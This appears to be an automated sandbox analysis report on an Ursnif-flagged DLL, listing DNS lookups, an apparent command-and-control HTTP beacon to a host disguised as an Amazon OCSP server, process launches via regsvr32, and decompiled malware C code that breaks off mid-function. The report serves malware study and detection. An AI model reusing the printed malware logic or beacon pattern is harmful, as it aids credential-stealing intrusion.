                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                      Nov 19, 2020 07:08:14.385813951 CET8.8.8.8192.168.2.40x569dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:16.610764027 CET8.8.8.8192.168.2.40x94b8No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:17.256714106 CET8.8.8.8192.168.2.40x9a92No error (0)contextual.media.net23.54.113.52A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.230067968 CET8.8.8.8192.168.2.40xb29dNo error (0)hblg.media.net23.54.113.52A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.391814947 CET8.8.8.8192.168.2.40xc8a0No error (0)lg3.media.net23.54.113.52A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:19.747216940 CET8.8.8.8192.168.2.40x8e0dNo error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.334691048 CET8.8.8.8192.168.2.40x877dNo error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.334691048 CET8.8.8.8192.168.2.40x877dNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.843549967 CET8.8.8.8192.168.2.40xe773No error (0)zem.outbrainimg.comoutbrain.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.843549967 CET8.8.8.8192.168.2.40xe773No error (0)outbrain.map.fastly.net151.101.2.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.843549967 CET8.8.8.8192.168.2.40xe773No error (0)outbrain.map.fastly.net151.101.66.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.843549967 CET8.8.8.8192.168.2.40xe773No error (0)outbrain.map.fastly.net151.101.130.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.843549967 CET8.8.8.8192.168.2.40xe773No error (0)outbrain.map.fastly.net151.101.194.132A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.852601051 CET8.8.8.8192.168.2.40xb9a9No error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.852601051 CET8.8.8.8192.168.2.40xb9a9No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.852601051 CET8.8.8.8192.168.2.40xb9a9No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.852601051 CET8.8.8.8192.168.2.40xb9a9No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:20.852601051 CET8.8.8.8192.168.2.40xb9a9No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.441028118 CET8.8.8.8192.168.2.40xed7eNo error (0)ocsp.sca1b.amazontrust.com54.230.104.94A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.441028118 CET8.8.8.8192.168.2.40xed7eNo error (0)ocsp.sca1b.amazontrust.com54.230.104.69A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.441028118 CET8.8.8.8192.168.2.40xed7eNo error (0)ocsp.sca1b.amazontrust.com54.230.104.223A (IP address)IN (0x0001)
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.441028118 CET8.8.8.8192.168.2.40xed7eNo error (0)ocsp.sca1b.amazontrust.com54.230.104.56A (IP address)IN (0x0001)

                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                      • ocsp.sca1b.amazontrust.com

                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                      0192.168.2.44977654.230.104.9480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.513952971 CET2406OUTGET /images/lcFsCCu6XNM4pzjDX9/Rf920MsPd/vgweJGGW4yMpnFFbKRdb/rMLnID4pno1jhDPg_2B/gCtnp5OejYlg5M0Xpnwv8O/gpi95pzZNi_2F/y_2F9cQy/vDMvSxl_2BNU9G_2FwH_2BP/AZJJtDQfBY/TKL237DbsWcS1Nmtn/Au9.avi HTTP/1.1
                                                                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                      Host: ocsp.sca1b.amazontrust.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Nov 19, 2020 07:08:56.688299894 CET2416INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/ocsp-response
                                                                                                                                                                                                                      Content-Length: 5
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: public, max-age=300
                                                                                                                                                                                                                      Date: Thu, 19 Nov 2020 06:08:56 GMT
                                                                                                                                                                                                                      ETag: "5f46cfe2-5"
                                                                                                                                                                                                                      Last-Modified: Wed, 26 Aug 2020 21:10:58 GMT
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      X-Cache: Miss from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5fa674fc9b94ee214ca1273ac912ec73.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: MRS52-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: zGC6_yBQlQhNyB3DunIACsVzHBKWskFpGC1P098U25Fd-_qyA0gHlw==
                                                                                                                                                                                                                      Data Raw: 30 03 0a 01 06
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      HTTPS Packets

                                                                                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.039803982 CET151.101.1.44443192.168.2.449756CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.056144953 CET151.101.1.44443192.168.2.449761CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.056418896 CET151.101.2.132443192.168.2.449763CN=*.outbrainimg.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Oct 13 07:57:47 CEST 2020 Thu Mar 17 17:40:46 CET 2016Mon Jan 11 06:57:47 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.057611942 CET151.101.1.44443192.168.2.449759CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.058651924 CET151.101.1.44443192.168.2.449757CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.058785915 CET151.101.1.44443192.168.2.449760CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.060260057 CET151.101.2.132443192.168.2.449762CN=*.outbrainimg.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Tue Oct 13 07:57:47 CEST 2020 Thu Mar 17 17:40:46 CET 2016Mon Jan 11 06:57:47 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021
                                                                                                                                                                                                                      Nov 19, 2020 07:08:21.060767889 CET151.101.1.44443192.168.2.449758CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                      CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USFri Mar 08 13:00:00 CET 2013Wed Mar 08 13:00:00 CET 2023

                                                                                                                                                                                                                      Code Manipulations

                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:10
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:loaddll32.exe 'C:\Users\user\Desktop\0pz1on1.dll'
                                                                                                                                                                                                                      Imagebase:0x100000
                                                                                                                                                                                                                      File size:119808 bytes
                                                                                                                                                                                                                      MD5 hash:62442CB29236B024E992A556DA72B97A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:10
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\0pz1on1.dll
                                                                                                                                                                                                                      Imagebase:0x150000
                                                                                                                                                                                                                      File size:20992 bytes
                                                                                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.709938495.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.710009927.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.709960999.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.709897369.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.710074481.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.925636434.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.709991832.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.709847934.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.710050270.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:11
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                                      Imagebase:0x11d0000
                                                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:11
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      Imagebase:0x7ff6a0090000
                                                                                                                                                                                                                      File size:823560 bytes
                                                                                                                                                                                                                      MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:12
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                      Imagebase:0xed0000
                                                                                                                                                                                                                      File size:822536 bytes
                                                                                                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:17
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:82952 /prefetch:2
                                                                                                                                                                                                                      Imagebase:0xed0000
                                                                                                                                                                                                                      File size:822536 bytes
                                                                                                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Start time:07:08:54
                                                                                                                                                                                                                      Start date:19/11/2020
                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6972 CREDAT:17436 /prefetch:2
                                                                                                                                                                                                                      Imagebase:0xed0000
                                                                                                                                                                                                                      File size:822536 bytes
                                                                                                                                                                                                                      MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                      Code Analysis

                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                                        			E026F523B(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				CHAR* _v20;
                                                                                                                                                                                                                        				struct _FILETIME _v28;
                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                                        				char* _v40;
                                                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                                                        				long _v344;
                                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                                        				void* _t74;
                                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                                                                        				CHAR* _t83;
                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                        				signed char _t89;
                                                                                                                                                                                                                        				signed char _t91;
                                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                                                        				long _t99;
                                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                                        				char* _t111;
                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                        				int _t119;
                                                                                                                                                                                                                        				char _t128;
                                                                                                                                                                                                                        				void* _t134;
                                                                                                                                                                                                                        				signed int _t136;
                                                                                                                                                                                                                        				char* _t139;
                                                                                                                                                                                                                        				signed int _t140;
                                                                                                                                                                                                                        				char* _t141;
                                                                                                                                                                                                                        				char* _t146;
                                                                                                                                                                                                                        				signed char* _t148;
                                                                                                                                                                                                                        				int _t151;
                                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                                        				void* _t165;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                        				_t148 = __eax;
                                                                                                                                                                                                                        				_t72 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        				_t74 = RtlAllocateHeap( *0x26fd238, 0, _t72 ^ 0x59935b44);
                                                                                                                                                                                                                        				_v20 = _t74;
                                                                                                                                                                                                                        				if(_t74 == 0) {
                                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                                        					return _v12;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t76 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        				_t78 = RtlAllocateHeap( *0x26fd238, 0, _t76 ^ 0x59935a4d);
                                                                                                                                                                                                                        				_t146 = 0;
                                                                                                                                                                                                                        				_v36 = _t78;
                                                                                                                                                                                                                        				if(_t78 == 0) {
                                                                                                                                                                                                                        					L35:
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, _t146, _v20);
                                                                                                                                                                                                                        					goto L36;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t136 =  *0x26fd2a0; // 0x59935a40
                                                                                                                                                                                                                        				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                                                                                                                                                                                                        				_t81 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t154 = _t153 + 0xc;
                                                                                                                                                                                                                        				_t5 = _t81 + 0x26fe7e8; // 0x73797325
                                                                                                                                                                                                                        				_t83 = E026F67CF(_t5);
                                                                                                                                                                                                                        				_v20 = _t83;
                                                                                                                                                                                                                        				if(_t83 == 0) {
                                                                                                                                                                                                                        					L34:
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, _t146, _v36);
                                                                                                                                                                                                                        					goto L35;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                                                        				_v28.dwLowDateTime = 0x59935a4d;
                                                                                                                                                                                                                        				_v28.dwHighDateTime = 0x59935a4d;
                                                                                                                                                                                                                        				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                        				_v32 = _t85;
                                                                                                                                                                                                                        				if(_t85 != 0x59935a4d) {
                                                                                                                                                                                                                        					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                                                                                                                                                        					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                                                        					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                                                                                                                                                        					FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                                                        				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                                                        				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                                                        				 *_t148 = _t91;
                                                                                                                                                                                                                        				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                                                        				_t93 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t16 = _t93 + 0x26fe809; // 0x642e2a5c
                                                                                                                                                                                                                        				_v40 = _t146;
                                                                                                                                                                                                                        				_v44 = _t89 & 0x000000ff;
                                                                                                                                                                                                                        				__imp__(_v20, _t16);
                                                                                                                                                                                                                        				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                                                                                                                                                        				_v16 = _t96;
                                                                                                                                                                                                                        				if(_t96 == _t134) {
                                                                                                                                                                                                                        					_t146 = 0;
                                                                                                                                                                                                                        					goto L34;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                        				while(_t99 > 0) {
                                                                                                                                                                                                                        					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                        					if(_t101 == 0) {
                                                                                                                                                                                                                        						FindClose(_v16);
                                                                                                                                                                                                                        						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                        						_v28.dwHighDateTime = _v344;
                                                                                                                                                                                                                        						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                        					_t109 = _v44;
                                                                                                                                                                                                                        					if(_v12 <= _t109) {
                                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t140 = _v12;
                                                                                                                                                                                                                        					if(_t140 > _v32) {
                                                                                                                                                                                                                        						_t141 = _v36;
                                                                                                                                                                                                                        						 *_a4 = _t141;
                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                        							_t128 =  *_t141;
                                                                                                                                                                                                                        							if(_t128 == 0) {
